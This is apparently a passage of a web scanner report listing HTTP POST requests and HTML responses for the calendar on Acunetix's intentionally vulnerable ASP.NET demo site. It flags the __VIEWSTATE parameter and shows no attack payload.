href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8581&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgAAlfL8eNsIZGRkClpT8E9mLxdFHJ9uhPt7Py8AmTU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL12fLDDwKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCvKfLAuCgDtBwR%2BpeX%2B%2FOzWjMF5D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:07 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgAAlfL8eNsIZGRkClpT8E9mLxdFHJ9uhPt7Py8AmTU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL12fLDDwKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCvKfLAuCgDtBwR+peX+/OzWjMF5D" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:White" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1177 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,177 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8585&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgAAPJwhfNsIZGRkhW9ckHKpWtyrzG3DCzhWnyeXaqE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKu4fP%2FBgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCjZysdTSa2jeODXtg4LAb5vUQmxy
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:48 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgAAPJwhfNsIZGRkhW9ckHKpWtyrzG3DCzhWnyeXaqE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKu4fP/BgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCjZysdTSa2jeODXtg4LAb5vUQmxy" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" 